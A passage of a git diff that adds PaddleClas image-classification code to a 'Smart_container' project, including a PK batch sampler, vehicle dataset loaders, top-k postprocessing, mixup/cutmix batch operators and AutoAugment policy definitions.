WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from collections import defaultdict +import numpy as np +import random +from paddle.io import DistributedBatchSampler + +from ppcls.utils import logger + + +class PKSampler(DistributedBatchSampler): + """ + First, randomly sample P identities. + Then for each identity randomly sample K instances. + Therefore batch size is P*K, and the sampler called PKSampler. + Args: + dataset (paddle.io.Dataset): list of (img_path, pid, cam_id). + sample_per_id(int): number of instances per identity in a batch. + batch_size (int): number of examples in a batch. + shuffle(bool): whether to shuffle indices order before generating + batch indices. Default False. + """ + + def __init__(self, + dataset, + batch_size, + sample_per_id, + shuffle=True, + drop_last=True, + sample_method="sample_avg_prob"): + super().__init__( + dataset, batch_size, shuffle=shuffle, drop_last=drop_last) + assert batch_size % sample_per_id == 0, \ + "PKSampler configs error, Sample_per_id must be a divisor of batch_size." + assert hasattr(self.dataset, + "labels"), "Dataset must have labels attribute." + self.sample_per_label = sample_per_id + self.label_dict = defaultdict(list) + self.sample_method = sample_method + for idx, label in enumerate(self.dataset.labels): + self.label_dict[label].append(idx) + self.label_list = list(self.label_dict) + assert len(self.label_list) * self.sample_per_label > self.batch_size, \ + "batch size should be smaller than " + if self.sample_method == "id_avg_prob": + self.prob_list = np.array([1 / len(self.label_list)] * + len(self.label_list)) + elif self.sample_method == "sample_avg_prob": + counter = [] + for label_i in self.label_list: + counter.append(len(self.label_dict[label_i])) + self.prob_list = np.array(counter) / sum(counter) + else: + logger.error( + "PKSampler only support id_avg_prob and sample_avg_prob sample method, " + "but receive {}.".format(self.sample_method)) + diff = np.abs(sum(self.prob_list) - 1) + if diff > 0.00000001: + self.prob_list[-1] = 1 - sum(self.prob_list[:-1]) + if self.prob_list[-1] > 1 or self.prob_list[-1] < 0: + logger.error("PKSampler prob list error") + else: + logger.info( + "PKSampler: sum of prob list not equal to 1, diff is {}, change the last prob".format(diff) + ) + + def __iter__(self): + label_per_batch = self.batch_size // self.sample_per_label + for _ in range(len(self)): + batch_index = [] + batch_label_list = np.random.choice( + self.label_list, + size=label_per_batch, + replace=False, + p=self.prob_list) + for label_i in batch_label_list: + label_i_indexes = self.label_dict[label_i] + if self.sample_per_label <= len(label_i_indexes): + batch_index.extend( + np.random.choice( + label_i_indexes, + size=self.sample_per_label, + replace=False)) + else: + batch_index.extend( + np.random.choice( + label_i_indexes, + size=self.sample_per_label, + replace=True)) + if not self.drop_last or len(batch_index) == self.batch_size: + yield batch_index diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/vehicle_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/vehicle_dataset.py new file mode 100644 index 0000000..80fc6bb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/vehicle_dataset.py @@ -0,0 +1,138 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np +import paddle +from paddle.io import Dataset +import os +import cv2 + +from ppcls.data import preprocess +from ppcls.data.preprocess import transform +from ppcls.utils import logger +from .common_dataset import create_operators + + +class CompCars(Dataset): + def __init__(self, + image_root, + cls_label_path, + label_root=None, + transform_ops=None, + bbox_crop=False): + self._img_root = image_root + self._cls_path = cls_label_path + self._label_root = label_root + if transform_ops: + self._transform_ops = create_operators(transform_ops) + self._bbox_crop = bbox_crop + self._dtype = paddle.get_default_dtype() + self._load_anno() + + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + if self._bbox_crop: + assert os.path.exists(self._label_root) + self.images = [] + self.labels = [] + self.bboxes = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split() + if not self._bbox_crop: + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + else: + label_path = os.path.join(self._label_root, + l[0].split('.')[0] + '.txt') + assert os.path.exists(label_path) + with open(label_path) as f: + bbox = f.readlines()[-1].strip().split() + bbox = [int(x) for x in bbox] + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + self.bboxes.append(bbox) + assert os.path.exists(self.images[-1]) + + def __getitem__(self, idx): + img = cv2.imread(self.images[idx]) + img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) + if self._bbox_crop: + bbox = self.bboxes[idx] + img = img[bbox[1]:bbox[3], bbox[0]:bbox[2], :] + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + return (img, self.labels[idx]) + + def __len__(self): + return len(self.images) + + @property + def class_num(self): + return len(set(self.labels)) + + +class VeriWild(Dataset): + def __init__( + self, + image_root, + cls_label_path, + transform_ops=None, ): + self._img_root = image_root + self._cls_path = cls_label_path + if transform_ops: + self._transform_ops = create_operators(transform_ops) + self._dtype = paddle.get_default_dtype() + self._load_anno() + + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + self.cameras = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split() + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + self.cameras.append(int(l[2])) + assert os.path.exists(self.images[-1]) + + def __getitem__(self, idx): + try: + with open(self.images[idx], 'rb') as f: + img = f.read() + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + return (img, self.labels[idx], self.cameras[idx]) + except Exception as ex: + logger.error("Exception occured when parse line: {} with msg: {}". + format(self.images[idx], ex)) + rnd_idx = np.random.randint(self.__len__()) + return self.__getitem__(rnd_idx) + + def __len__(self): + return len(self.images) + + @property + def class_num(self): + return len(set(self.labels)) diff --git a/Smart_container/PaddleClas/ppcls/data/postprocess/__init__.py b/Smart_container/PaddleClas/ppcls/data/postprocess/__init__.py new file mode 100644 index 0000000..831a4da --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/postprocess/__init__.py @@ -0,0 +1,41 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import copy +import importlib + +from . import topk + +from .topk import Topk, MultiLabelTopk + + +def build_postprocess(config): + config = copy.deepcopy(config) + model_name = config.pop("name") + mod = importlib.import_module(__name__) + postprocess_func = getattr(mod, model_name)(**config) + return postprocess_func + + +class DistillationPostProcess(object): + def __init__(self, model_name="Student", key=None, func="Topk", **kargs): + super().__init__() + self.func = eval(func)(**kargs) + self.model_name = model_name + self.key = key + + def __call__(self, x, file_names=None): + x = x[self.model_name] + if self.key is not None: + x = x[self.key] + return self.func(x, file_names=file_names) diff --git a/Smart_container/PaddleClas/ppcls/data/postprocess/topk.py b/Smart_container/PaddleClas/ppcls/data/postprocess/topk.py new file mode 100644 index 0000000..9c1371b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/postprocess/topk.py @@ -0,0 +1,85 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import numpy as np +import paddle +import paddle.nn.functional as F + + +class Topk(object): + def __init__(self, topk=1, class_id_map_file=None): + assert isinstance(topk, (int, )) + self.class_id_map = self.parse_class_id_map(class_id_map_file) + self.topk = topk + + def parse_class_id_map(self, class_id_map_file): + if class_id_map_file is None: + return None + if not os.path.exists(class_id_map_file): + print( + "Warning: If want to use your own label_dict, please input legal path!\nOtherwise label_names will be empty!" + ) + return None + + try: + class_id_map = {} + with open(class_id_map_file, "r") as fin: + lines = fin.readlines() + for line in lines: + partition = line.split("\n")[0].partition(" ") + class_id_map[int(partition[0])] = str(partition[-1]) + except Exception as ex: + print(ex) + class_id_map = None + return class_id_map + + def __call__(self, x, file_names=None, multilabel=False): + assert isinstance(x, paddle.Tensor) + if file_names is not None: + assert x.shape[0] == len(file_names) + x = F.softmax(x, axis=-1) if not multilabel else F.sigmoid(x) + x = x.numpy() + y = [] + for idx, probs in enumerate(x): + index = probs.argsort(axis=0)[-self.topk:][::-1].astype( + "int32") if not multilabel else np.where( + probs >= 0.5)[0].astype("int32") + clas_id_list = [] + score_list = [] + label_name_list = [] + for i in index: + clas_id_list.append(i.item()) + score_list.append(probs[i].item()) + if self.class_id_map is not None: + label_name_list.append(self.class_id_map[i.item()]) + result = { + "class_ids": clas_id_list, + "scores": np.around( + score_list, decimals=5).tolist(), + } + if file_names is not None: + result["file_name"] = file_names[idx] + if label_name_list is not None: + result["label_names"] = label_name_list + y.append(result) + return y + + +class MultiLabelTopk(Topk): + def __init__(self, topk=1, class_id_map_file=None): + super().__init__() + + def __call__(self, x, file_names=None): + return super().__call__(x, file_names, multilabel=True) diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/__init__.py b/Smart_container/PaddleClas/ppcls/data/preprocess/__init__.py new file mode 100644 index 0000000..075ee89 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/__init__.py @@ -0,0 +1,100 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from ppcls.data.preprocess.ops.autoaugment import ImageNetPolicy as RawImageNetPolicy +from ppcls.data.preprocess.ops.randaugment import RandAugment as RawRandAugment +from ppcls.data.preprocess.ops.timm_autoaugment import RawTimmAutoAugment +from ppcls.data.preprocess.ops.cutout import Cutout + +from ppcls.data.preprocess.ops.hide_and_seek import HideAndSeek +from ppcls.data.preprocess.ops.random_erasing import RandomErasing +from ppcls.data.preprocess.ops.grid import GridMask + +from ppcls.data.preprocess.ops.operators import DecodeImage +from ppcls.data.preprocess.ops.operators import ResizeImage +from ppcls.data.preprocess.ops.operators import CropImage +from ppcls.data.preprocess.ops.operators import RandCropImage +from ppcls.data.preprocess.ops.operators import RandFlipImage +from ppcls.data.preprocess.ops.operators import NormalizeImage +from ppcls.data.preprocess.ops.operators import ToCHWImage +from ppcls.data.preprocess.ops.operators import AugMix + +from ppcls.data.preprocess.batch_ops.batch_operators import MixupOperator, CutmixOperator, OpSampler, FmixOperator + +import numpy as np +from PIL import Image + + +def transform(data, ops=[]): + """ transform """ + for op in ops: + data = op(data) + return data + + +class AutoAugment(RawImageNetPolicy): + """ ImageNetPolicy wrapper to auto fit different img types """ + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + def __call__(self, img): + if not isinstance(img, Image.Image): + img = np.ascontiguousarray(img) + img = Image.fromarray(img) + + img = super().__call__(img) + + if isinstance(img, Image.Image): + img = np.asarray(img) + + return img + + +class RandAugment(RawRandAugment): + """ RandAugment wrapper to auto fit different img types """ + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + def __call__(self, img): + if not isinstance(img, Image.Image): + img = np.ascontiguousarray(img) + img = Image.fromarray(img) + + img = super().__call__(img) + + if isinstance(img, Image.Image): + img = np.asarray(img) + + return img + + +class TimmAutoAugment(RawTimmAutoAugment): + """ TimmAutoAugment wrapper to auto fit different img tyeps. """ + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + def __call__(self, img): + if not isinstance(img, Image.Image): + img = np.ascontiguousarray(img) + img = Image.fromarray(img) + + img = super().__call__(img) + + if isinstance(img, Image.Image): + img = np.asarray(img) + + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/batch_ops/__init__.py b/Smart_container/PaddleClas/ppcls/data/preprocess/batch_ops/__init__.py new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/batch_ops/__init__.py @@ -0,0 +1 @@ + diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/batch_ops/batch_operators.py b/Smart_container/PaddleClas/ppcls/data/preprocess/batch_ops/batch_operators.py new file mode 100644 index 0000000..1f3bd32 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/batch_ops/batch_operators.py @@ -0,0 +1,183 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +from __future__ import unicode_literals +import random + +import numpy as np + +from ppcls.utils import logger +from ppcls.data.preprocess.ops.fmix import sample_mask + + +class BatchOperator(object): + """ BatchOperator """ + + def __init__(self, *args, **kwargs): + pass + + def _unpack(self, batch): + """ _unpack """ + assert isinstance(batch, list), \ + 'batch should be a list filled with tuples (img, label)' + bs = len(batch) + assert bs > 0, 'size of the batch data should > 0' + #imgs, labels = list(zip(*batch)) + imgs = [] + labels = [] + for item in batch: + imgs.append(item[0]) + labels.append(item[1]) + return np.array(imgs), np.array(labels), bs + + def __call__(self, batch): + return batch + + +class MixupOperator(BatchOperator): + """ Mixup operator """ + + def __init__(self, alpha: float=1.): + """Build Mixup operator + + Args: + alpha (float, optional): The parameter alpha of mixup. Defaults to 1.. + + Raises: + Exception: The value of parameter is illegal. + """ + if alpha <= 0: + raise Exception( + f"Parameter \"alpha\" of Mixup should be greater than 0. \"alpha\": {alpha}." + ) + self._alpha = alpha + + def __call__(self, batch): + imgs, labels, bs = self._unpack(batch) + idx = np.random.permutation(bs) + lam = np.random.beta(self._alpha, self._alpha) + lams = np.array([lam] * bs, dtype=np.float32) + imgs = lam * imgs + (1 - lam) * imgs[idx] + return list(zip(imgs, labels, labels[idx], lams)) + + +class CutmixOperator(BatchOperator): + """ Cutmix operator """ + + def __init__(self, alpha=0.2): + """Build Cutmix operator + + Args: + alpha (float, optional): The parameter alpha of cutmix. Defaults to 0.2. + + Raises: + Exception: The value of parameter is illegal. + """ + if alpha <= 0: + raise Exception( + f"Parameter \"alpha\" of Cutmix should be greater than 0. \"alpha\": {alpha}." + ) + self._alpha = alpha + + def _rand_bbox(self, size, lam): + """ _rand_bbox """ + w = size[2] + h = size[3] + cut_rat = np.sqrt(1. - lam) + cut_w = int(w * cut_rat) + cut_h = int(h * cut_rat) + + # uniform + cx = np.random.randint(w) + cy = np.random.randint(h) + + bbx1 = np.clip(cx - cut_w // 2, 0, w) + bby1 = np.clip(cy - cut_h // 2, 0, h) + bbx2 = np.clip(cx + cut_w // 2, 0, w) + bby2 = np.clip(cy + cut_h // 2, 0, h) + + return bbx1, bby1, bbx2, bby2 + + def __call__(self, batch): + imgs, labels, bs = self._unpack(batch) + idx = np.random.permutation(bs) + lam = np.random.beta(self._alpha, self._alpha) + + bbx1, bby1, bbx2, bby2 = self._rand_bbox(imgs.shape, lam) + imgs[:, :, bbx1:bbx2, bby1:bby2] = imgs[idx, :, bbx1:bbx2, bby1:bby2] + lam = 1 - (float(bbx2 - bbx1) * (bby2 - bby1) / + (imgs.shape[-2] * imgs.shape[-1])) + lams = np.array([lam] * bs, dtype=np.float32) + return list(zip(imgs, labels, labels[idx], lams)) + + +class FmixOperator(BatchOperator): + """ Fmix operator """ + + def __init__(self, alpha=1, decay_power=3, max_soft=0., reformulate=False): + self._alpha = alpha + self._decay_power = decay_power + self._max_soft = max_soft + self._reformulate = reformulate + + def __call__(self, batch): + imgs, labels, bs = self._unpack(batch) + idx = np.random.permutation(bs) + size = (imgs.shape[2], imgs.shape[3]) + lam, mask = sample_mask(self._alpha, self._decay_power, \ + size, self._max_soft, self._reformulate) + imgs = mask * imgs + (1 - mask) * imgs[idx] + return list(zip(imgs, labels, labels[idx], [lam] * bs)) + + +class OpSampler(object): + """ Sample a operator from """ + + def __init__(self, **op_dict): + """Build OpSampler + + Raises: + Exception: The parameter \"prob\" of operator(s) are be set error. + """ + if len(op_dict) < 1: + msg = f"ConfigWarning: No operator in \"OpSampler\". \"OpSampler\" has been skipped." + + self.ops = {} + total_prob = 0 + for op_name in op_dict: + param = op_dict[op_name] + if "prob" not in param: + msg = f"ConfigWarning: Parameter \"prob\" should be set when use operator in \"OpSampler\". The operator \"{op_name}\"'s prob has been set \"0\"." + logger.warning(msg) + prob = param.pop("prob", 0) + total_prob += prob + op = eval(op_name)(**param) + self.ops.update({op: prob}) + + if total_prob > 1: + msg = f"ConfigError: The total prob of operators in \"OpSampler\" should be less 1." + logger.error(msg) + raise Exception(msg) + + # add "None Op" when total_prob < 1, "None Op" do nothing + self.ops[None] = 1 - total_prob + + def __call__(self, batch): + op = random.choices( + list(self.ops.keys()), weights=list(self.ops.values()), k=1)[0] + # return batch directly when None Op + return op(batch) if op else batch diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/__init__.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/__init__.py new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/__init__.py @@ -0,0 +1 @@ + diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/autoaugment.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/autoaugment.py new file mode 100644 index 0000000..330220a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/autoaugment.py @@ -0,0 +1,264 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/DeepVoltaire/AutoAugment/blob/master/autoaugment.py + +from PIL import Image, ImageEnhance, ImageOps +import numpy as np +import random + + +class ImageNetPolicy(object): + """ Randomly choose one of the best 24 Sub-policies on ImageNet. + + Example: + >>> policy = ImageNetPolicy() + >>> transformed = policy(image) + + Example as a PyTorch Transform: + >>> transform=transforms.Compose([ + >>> transforms.Resize(256), + >>> ImageNetPolicy(), + >>> transforms.ToTensor()]) + """ + + def __init__(self, fillcolor=(128, 128, 128)): + self.policies = [ + SubPolicy(0.4, "posterize", 8, 0.6, "rotate", 9, fillcolor), + SubPolicy(0.6, "solarize", 5, 0.6, "autocontrast", 5, fillcolor), + SubPolicy(0.8, "equalize", 8, 0.6, "equalize", 3, fillcolor), + SubPolicy(0.6, "posterize", 7, 0.6, "posterize", 6, fillcolor), + SubPolicy(0.4, "equalize", 7, 0.2, "solarize", 4, fillcolor), + SubPolicy(0.4, "equalize", 4, 0.8, "rotate", 8, fillcolor), + SubPolicy(0.6, "solarize", 3, 0.6, "equalize", 7, fillcolor), + SubPolicy(0.8, "posterize", 5, 1.0, "equalize", 2, fillcolor), + SubPolicy(0.2, "rotate", 3, 0.6, "solarize", 8, fillcolor), + SubPolicy(0.6, "equalize", 8, 0.4, "posterize", 6, fillcolor), + SubPolicy(0.8, "rotate", 8, 0.4, "color", 0, fillcolor), + SubPolicy(0.4, "rotate", 9, 0.6, "equalize", 2, fillcolor), + SubPolicy(0.0, "equalize", 7, 0.8, "equalize", 8, fillcolor), + SubPolicy(0.6, "invert", 4, 1.0, "equalize", 8, fillcolor), + SubPolicy(0.6, "color", 4, 1.0, "contrast", 8, fillcolor), + SubPolicy(0.8, "rotate", 8, 1.0, "color", 2, fillcolor), + SubPolicy(0.8, "color", 8, 0.8, "solarize", 7, fillcolor), + SubPolicy(0.4, "sharpness", 7, 0.6, "invert", 8, fillcolor), + SubPolicy(0.6, "shearX", 5, 1.0, "equalize", 9, fillcolor), + SubPolicy(0.4, "color", 0, 0.6, "equalize", 3, fillcolor), + SubPolicy(0.4, "equalize", 7, 0.2, "solarize", 4, fillcolor), + SubPolicy(0.6, "solarize", 5, 0.6, "autocontrast", 5, fillcolor), + SubPolicy(0.6, "invert", 4, 1.0, "equalize", 8, fillcolor), + SubPolicy(0.6, "color", 4, 1.0, "contrast", 8, fillcolor), + SubPolicy(0.8, "equalize", 8, 0.6, "equalize", 3, fillcolor) + ] + + def __call__(self, img, policy_idx=None): + if policy_idx is None or not isinstance(policy_idx, int): + policy_idx = random.randint(0, len(self.policies) - 1) + else: + policy_idx = policy_idx % len(self.policies) + return self.policies[policy_idx](img) + + def __repr__(self): + return "AutoAugment ImageNet Policy" + + +class CIFAR10Policy(object): + """ Randomly choose one of the best 25 Sub-policies on CIFAR10. + + Example: + >>> policy = CIFAR10Policy() + >>> transformed = policy(image) + + Example as a PyTorch Transform: + >>> transform=transforms.Compose([ + >>> transforms.Resize(256), + >>> CIFAR10Policy(), + >>> transforms.ToTensor()]) + """ + + def __init__(self, fillcolor=(128, 128, 128)): + self.policies = [ + SubPolicy(0.1, "invert", 7, 0.2, "contrast", 6, fillcolor), + SubPolicy(0.7, "rotate", 2, 0.3, "translateX", 9, fillcolor), + SubPolicy(0.8, "sharpness", 1, 0.9, "sharpness", 3, fillcolor), + SubPolicy(0.5, "shearY", 8, 0.7, "translateY", 9, fillcolor), + SubPolicy(0.5, "autocontrast", 8, 0.9, "equalize", 2, fillcolor), + SubPolicy(0.2, "shearY", 7, 0.3, "posterize", 7, fillcolor), + SubPolicy(0.4, "color", 3, 0.6, "brightness", 7, fillcolor), + SubPolicy(0.3, "sharpness", 9, 0.7, "brightness", 9, fillcolor), + SubPolicy(0.6, "equalize", 5, 0.5, "equalize", 1, fillcolor), + SubPolicy(0.6, "contrast", 7, 0.6, "sharpness", 5, fillcolor), + SubPolicy(0.7, "color", 7, 0.5, "translateX", 8, fillcolor), + SubPolicy(0.3, "equalize", 7, 0.4, "autocontrast", 8, fillcolor), + SubPolicy(0.4, "translateY", 3, 0.2, "sharpness", 6, fillcolor), + SubPolicy(0.9, "brightness", 6, 0.2, "color", 8, fillcolor), + SubPolicy(0.5, "solarize", 2, 0.0, "invert", 3, fillcolor), + SubPolicy(0.2, "equalize", 0, 0.6, "autocontrast", 0, fillcolor), + SubPolicy(0.2, "equalize", 8, 0.8, "equalize", 4, fillcolor), + SubPolicy(0.9, "color", 9, 0.6, "equalize", 6, fillcolor), + SubPolicy(0.8, "autocontrast", 4, 0.2, "solarize", 8, fillcolor), + SubPolicy(0.1, "brightness", 3, 0.7, "color", 0, fillcolor), + SubPolicy(0.4, "solarize", 5, 0.9, "autocontrast", 3, fillcolor), + SubPolicy(0.9, "translateY", 9, 0.7, "translateY", 9, fillcolor), + SubPolicy(0.9, "autocontrast", 2, 0.8, "solarize", 3, fillcolor), + SubPolicy(0.8, "equalize", 8, 0.1, "invert", 3, fillcolor), + SubPolicy(0.7, "translateY", 9, 0.9, "autocontrast", 1, fillcolor) + ] + + def __call__(self, img, policy_idx=None): + if policy_idx is None or not isinstance(policy_idx, int): + policy_idx = random.randint(0, len(self.policies) - 1) + else: + policy_idx = policy_idx % len(self.policies) + return self.policies[policy_idx](img) + + def __repr__(self): + return "AutoAugment CIFAR10 Policy" + + +class SVHNPolicy(object): + """ Randomly choose one of the best 25 Sub-policies on SVHN. + + Example: + >>> policy = SVHNPolicy() + >>> transformed = policy(image) + + Example as a PyTorch Transform: + >>> transform=transforms.Compose([ + >>> transforms.Resize(256), + >>> SVHNPolicy(), + >>> transforms.ToTensor()]) + """ + + def __init__(self, fillcolor=(128, 128, 128)): + self.policies = [ + SubPolicy(0.9, "shearX", 4, 0.2, "invert", 3, fillcolor), + SubPolicy(0.9, "shearY", 8, 0.7, "invert", 5, fillcolor), + SubPolicy(0.6, "equalize", 5, 0.6, "solarize", 6, fillcolor), + SubPolicy(0.9, "invert", 3, 0.6, "equalize", 3, fillcolor), + SubPolicy(0.6, "equalize", 1, 0.9, "rotate", 3, fillcolor), + SubPolicy(0.9, "shearX", 4, 0.8, "autocontrast", 3, fillcolor), + SubPolicy(0.9, "shearY", 8, 0.4, "invert", 5, fillcolor), + SubPolicy(0.9, "shearY", 5, 0.2, "solarize", 6, fillcolor), + SubPolicy(0.9, "invert", 6, 0.8, "autocontrast", 1, fillcolor), + SubPolicy(0.6, "equalize", 3, 0.9, "rotate", 3, fillcolor), + SubPolicy(0.9, "shearX", 4, 0.3, "solarize", 3, fillcolor), + SubPolicy(0.8, "shearY", 8, 0.7, "invert", 4, fillcolor), + SubPolicy(0.9, "equalize", 5, 0.6, "translateY", 6, fillcolor), + SubPolicy(0.9, "invert", 4, 0.6, "equalize", 7, fillcolor), + SubPolicy(0.3, "contrast", 3, 0.8, "rotate", 4, fillcolor), + SubPolicy(0.8, "invert", 5, 0.0, "translateY", 2, fillcolor), + SubPolicy(0.7, "shearY", 6, 0.4, "solarize", 8, fillcolor), + SubPolicy(0.6, "invert", 4, 0.8, "rotate", 4, fillcolor), + SubPolicy( + 0.3, "shearY", 7, 0.9, "translateX", 3, fillcolor), SubPolicy( + 0.1, "shearX", 6, 0.6, "invert", 5, fillcolor), SubPolicy( + 0.7, "solarize", 2, 0.6, "translateY", 7, + fillcolor), SubPolicy(0.8, "shearY", 4, 0.8, "invert", + 8, fillcolor), SubPolicy( + 0.7, "shearX", 9, 0.8, + "translateY", 3, + fillcolor), SubPolicy( + 0.8, "shearY", 5, 0.7, + "autocontrast", 3, + fillcolor), + SubPolicy(0.7, "shearX", 2, 0.1, "invert", 5, fillcolor) + ] + + def __call__(self, img, policy_idx=None): + if policy_idx is None or not isinstance(policy_idx, int): + policy_idx = random.randint(0, len(self.policies) - 1) + else: + policy_idx = policy_idx % len(self.policies) + return self.policies[policy_idx](img) + + def __repr__(self): + return "AutoAugment SVHN Policy" + + +class SubPolicy(object): + def __init__(self, + p1, + operation1, + magnitude_idx1, + p2, + operation2, + magnitude_idx2, + fillcolor=(128, 128, 128)): + ranges = { + "shearX": np.linspace(0, 0.3, 10), + "shearY": np.linspace(0, 0.3, 10), + "translateX": np.linspace(0, 150 / 331, 10), + "translateY": np.linspace(0, 150 / 331, 10), + "rotate": np.linspace(0, 30, 10), + "color": np.linspace(0.0, 0.9, 10), + "posterize": np.round(np.linspace(8, 4, 10), 0).astype(np.int), + "solarize": np.linspace(256, 0, 10), + "contrast": np.linspace(0.0, 0.9, 10), + "sharpness": np.linspace(0.0, 0.9, 10), + "brightness": np.linspace(0.0, 0.9, 10), + "autocontrast": [0] * 10, + "equalize": [0] * 10, + "invert": [0] * 10 + } + + # from https://stackoverflow.com/questions/5252170/specify-image-filling-color-when-rotating-in-python-with-pil-and-setting-expand + def rotate_with_fill(img, magnitude): + rot = img.convert("RGBA").rotate(magnitude) + return Image.composite(rot, + Image.new("RGBA", rot.size, (128, ) * 4), + rot).convert(img.mode) + + func = { + "shearX": lambda img, magnitude: img.transform( + img.size, Image.AFFINE, (1, magnitude * random.choice([-1, 1]), 0, 0, 1, 0), + Image.BICUBIC, fillcolor=fillcolor), + "shearY": lambda img, magnitude: img.transform( + img.size, Image.AFFINE, (1, 0, 0, magnitude * random.choice([-1, 1]), 1, 0), + Image.BICUBIC, fillcolor=fillcolor), + "translateX": lambda img, magnitude: img.transform( + img.size, Image.AFFINE, (1, 0, magnitude * img.size[0] * random.choice([-1, 1]), 0, 1, 0), + fillcolor=fillcolor), + "translateY": lambda img, magnitude: img.transform( + img.size, Image.AFFINE, (1, 0, 0, 0, 1, magnitude * img.size[1] * random.choice([-1, 1])), + fillcolor=fillcolor), + "rotate": lambda img, magnitude: rotate_with_fill(img, magnitude), + # "rotate": lambda img, magnitude: img.rotate(magnitude * random.choice([-1, 1])), + "color": lambda img, magnitude: ImageEnhance.Color(img).enhance(1 + magnitude * random.choice([-1, 1])), + "posterize": lambda img, magnitude: ImageOps.posterize(img, magnitude), + "solarize": lambda img, magnitude: ImageOps.solarize(img, magnitude), + "contrast": lambda img, magnitude: ImageEnhance.Contrast(img).enhance( + 1 + magnitude * random.choice([-1, 1])), + "sharpness": lambda img, magnitude: ImageEnhance.Sharpness(img).enhance( + 1 + magnitude * random.choice([-1, 1])), + "brightness": lambda img, magnitude: ImageEnhance.Brightness(img).enhance( + 1 + magnitude * random.choice([-1, 1])), + "autocontrast": lambda img, magnitude: ImageOps.autocontrast(img), + "equalize": lambda img, magnitude: ImageOps.equalize(img), + "invert": lambda img, magnitude: ImageOps.invert(img) + } + + self.p1 = p1 + self.operation1 = func[operation1] + 